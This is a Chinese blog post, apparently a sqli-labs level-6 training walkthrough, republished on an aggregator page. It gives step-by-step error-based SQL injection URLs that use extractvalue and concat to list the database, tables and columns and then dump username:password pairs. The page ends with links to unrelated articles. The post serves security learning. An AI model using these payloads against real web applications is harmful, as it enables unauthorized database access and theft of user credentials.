SQL注入漏洞解析--less-6

1.第六關了。

?

?2.這個和第五關有點像,只是換成了雙引號,接下來的都一樣,看我操作(換個函數試一下extractvalue,他的報錯位置在第二個,那我就利用一下)

3.爆庫名?

?id=1"%20and%20extractvalue(1,concat(0x7e,(select%20database()),0x7e))--+?

4.爆表名?

?id=1"%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema="security"),0x7e))--+

5.爆列名?

?id=1"%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema="security"%20and%20table_name="users"),0x7e))--+

6.數據查看?

?id=1"%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(username,0x3a,password)%20from%20users),0x7e))--+

7.字段截取?

?id=1"%20and%20extractvalue(1,concat(0x7e,(select%20substring(group_concat(username,0x3a,password),1,32)%20from%20users),0x7e))--+

/?id=1"%20and%20extractvalue(1,concat(0x7e,(select%20substring(group_concat(username,0x3a,password),32,64)%20from%20users),0x7e))--+

這樣就拿到第六關的數據了

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/711722.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/711722.shtml
英文地址,請注明出處:http://en.pswp.cn/news/711722.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

刷題日記 | 字符串擴容和增強型for循環

刷題日記 | 字符串擴容和增強型for循環

for(char c:s)遍歷字符串 增強型for循環 C for(char c:s)遍歷字符串 增強型for循環_c for (char c : s)-CSDN博客 字符串使用前要進行擴容 reserve函數 【CString類成員函數辨析】resize(),size(),capacity(),reserve()函數的解析與對比_c reserve函數-CSDN博客 a.size() 用來…
閱讀更多...
告警閃現后的故障排查

告警閃現后的故障排查

長期以來,醫院信息化運維中存在著科室復雜、應用場景多、終端運維工作量大、軟件系統兼容需求強等諸多痛點,且對技術設備的穩定性、連續性要求極高,在日常運維中,需要應對和解決這些問題來保障業務穩定、健康運行。 1、數據孤島 …
閱讀更多...
Centos6安裝PyTorch要求的更高版本gcc

Centos6安裝PyTorch要求的更高版本gcc

文章目錄 CentOS自帶版本安裝gcc 4的版本1. 獲取devtoolset-8的yum源2. 安裝gcc3. 版本檢查和切換版本 常見問題1. 找不到包audit*.rpm包2. 找不到libcgroup-0.40.rc1-27.el6_10.x86_64.rpm 的包4. cc: fatal error: Killed signal terminated program cc1plus5. pybind11/pybi…
閱讀更多...
安達發|可視化APS高級排產系統實現精益制造

安達發|可視化APS高級排產系統實現精益制造

精益制造已經成為了一種重要的生產模式,它的目標是通過消除浪費,提高生產效率,以實現更高的質量和更低的成本。而可視化APS高級排產系統則是實現精益制造的重要工具。下面,我將從接單可視化、BOM工藝可視化、計劃與排程可視化、制…
閱讀更多...
[Android 13]Input系列--獲取觸摸窗口

[Android 13]Input系列--獲取觸摸窗口

[Android 13]Input系列–獲取觸摸窗口 hongxi.zhu 2023-7-25 Android 13 InputDispatcher::dispatchMotionLocked bool InputDispatcher::dispatchMotionLocked(nsecs_t currentTime, std::shared_ptr<MotionEntry> entry,DropReason* dropReason, nsecs_t* nextWakeupT…
閱讀更多...
【Flink精講】Flink性能調優:CPU核數與并行度

【Flink精講】Flink性能調優:CPU核數與并行度

常見問題 舉個例子 提交任務命令&#xff1a; bin/flink run \ -t yarn-per-job \ -d \ -p 5 \ 指定并行度 -Dyarn.application.queuetest \ 指定 yarn 隊列 -Djobmanager.memory.process.size2048mb \ JM2~4G 足夠 -Dtaskmanager.memory.process.size4096mb \ 單個 TM2~8G 足…
閱讀更多...
Android 性能優化--APK加固(1)混淆

Android 性能優化--APK加固(1)混淆

文章目錄 為什么要開啟混淆如何開啟代碼混淆如何開啟資源壓縮代碼混淆配置代碼混淆后&#xff0c;Crash 問題定位結尾 本文首發地址&#xff1a;https://h89.cn/archives/211.html 最新更新地址&#xff1a;https://gitee.com/chenjim/chenjimblog 為什么要開啟混淆 先上一個 …
閱讀更多...
【會議征稿通知】第十屆人文學科與社會科學研究國際學術會議(ICHSSR 2024)

【會議征稿通知】第十屆人文學科與社會科學研究國際學術會議(ICHSSR 2024)

第十屆人文學科與社會科學研究國際學術會議&#xff08;ICHSSR 2024) 2024 10th International Conference on Humanities and Social Science Research 第十屆人文學科與社會科學研究國際學術會議&#xff08;ICHSSR 2023)將于2024年4月26-28日在中國廈門隆重舉行。會議主要…
閱讀更多...
工廠生產效率如何提升?這8個重點你不得不看!

工廠生產效率如何提升?這8個重點你不得不看!

企業的競爭本質上就是效率與成本的競爭&#xff08;當然是保證產品質量的前提下&#xff09;&#xff0c;如何持續不斷地提高生產效率是企業永續發展的關鍵問題&#xff0c;提高生產效率也是降低制造成本的根本途徑。 當然&#xff0c;我們必須嚴格根據工藝標準來操作&#xf…
閱讀更多...
如何通過ip查詢用戶的歸屬地

如何通過ip查詢用戶的歸屬地

背景 最近公司做了一些營銷活動&#xff0c;投入資金進行了流量推廣&#xff0c;pv、UV都做了統計。老板說&#xff0c;我要看下用戶的區域分布的數據。 以前的文章我講過&#xff0c;pv、UV如何統計&#xff1f;我們是基于ip進行統計的。用的ip能獲取到&#xff0c;那通過ip…
閱讀更多...
清空網頁緩存

清空網頁緩存

閱讀更多...
JavaScript繼承

JavaScript繼承

JavaScript繼承 1、JS 的繼承到底有多少種實現方式呢? 2、ES6 的 extends 關鍵字是用哪種繼承方式實現的呢? 繼承種類 原型鏈繼承 function Parent1() {this.name parentlthis.play [1, 2, 3] }function Child1() {this.type child2 }Child1.prototype new Parent1(…
閱讀更多...
應用穩定性優化1:ANR問題全面解析

應用穩定性優化1:ANR問題全面解析

閃退、崩潰、無響應、重啟等是應用穩定性常見的問題現象&#xff0c;穩定性故障大體可歸類為ANR/凍屏、Crash/Tombstone、資源泄露三大類。本文通過對三類故障的產生原因、故障現象、觸發機制及如何定位等&#xff0c;展開深度解讀。 本文將詳解ANR類故障&#xff0c;并通過一…
閱讀更多...
寶塔php站點設置偽靜態規則 訪問 a.com 時候跳轉到 a.com/b.html

寶塔php站點設置偽靜態規則 訪問 a.com 時候跳轉到 a.com/b.html

要在寶塔 PHP 站點中設置偽靜態規則&#xff0c;實現訪問a.com時跳轉到a.com/b.html&#xff0c;可以按照以下步驟進行操作&#xff1a; 打開寶塔面板并登錄到你的服務器管理界面。進入網站設置頁面&#xff0c;找到你要設置偽靜態規則的 PHP 站點。在站點設置中&#xff0c;找…
閱讀更多...
已解決System.ServiceModel.EndpointNotFoundException端點未找到異常的正確解決方法,親測有效!!!

已解決System.ServiceModel.EndpointNotFoundException端點未找到異常的正確解決方法,親測有效!!!

已解決System.ServiceModel.EndpointNotFoundException端點未找到異常的正確解決方法&#xff0c;親測有效&#xff01;&#xff01;&#xff01; 目錄 問題分析 出現問題的場景 報錯原因 解決思路 解決方法 總結 在開發和使用基于Windows Communication Foundation (WC…
閱讀更多...
【前端素材】推薦優質后臺管理系統cassie平臺模板(附源碼)

【前端素材】推薦優質后臺管理系統cassie平臺模板(附源碼)

一、需求分析 1、系統定義 后臺管理系統是一種用于管理網站、應用程序或系統的管理界面&#xff0c;通常由管理員和工作人員使用。它提供了訪問和控制網站或應用程序后臺功能的工具和界面&#xff0c;使其能夠管理用戶、內容、數據和其他各種功能。 2、功能需求 后臺管理系…
閱讀更多...
解鎖AI大模型秘籍:未來科技的前沿探索

解鎖AI大模型秘籍:未來科技的前沿探索

在當今這個技術高速發展的時代&#xff0c;人工智能&#xff08;AI&#xff09;已經成為了我們生活中不可或缺的一部分。從簡單的個人助手到復雜的數據分析和決策制定&#xff0c;AI的應用范圍日益擴大&#xff0c;其目的是為了讓我們的生活變得更加智能化。本文旨在探討AI如何…
閱讀更多...
【單片機學習的準備】

【單片機學習的準備】

文章目錄 前言一、找一個視頻是二、畫圖軟件三、裝keil5 仿真protues總結 前言 提示&#xff1a;這里可以添加本文要記錄的大概內容&#xff1a; 項目需要&#xff1a; 提示&#xff1a;以下是本篇文章正文內容&#xff0c;下面案例可供參考 一、找一個視頻是 https://www.b…
閱讀更多...
一文了解Lint工具的優缺點,以及它與高級靜態分析工具的比較

一文了解Lint工具的優缺點,以及它與高級靜態分析工具的比較

避免軟件缺陷是所有開發者的共同追求&#xff0c;因為一旦出現錯誤&#xff0c;可能導致用戶體驗下降&#xff0c;甚至威脅到關鍵系統的安全。不論您正在開發何種類型的程序&#xff0c;避免這些缺陷都是至關重要的。這就是為什么許多開發團隊都依賴Lint。 什么是Linting&#…
閱讀更多...
農產品質量追溯系統—簡介

農產品質量追溯系統—簡介

概要 農產品質量安全事關廣大人民群眾的食用安全和身體健康。解決農產品質量安全問題,需要從源頭開始抓好、抓實農產品安全監管工作。通過建立從產地到市場的全程質量控制系統和追溯制度,對農產品產地環境、生產過程、產品檢測、包裝盒標識等關鍵環節進行監督管理,提高廣大…
閱讀更多...
最新文章

Copyright @ 2022~2023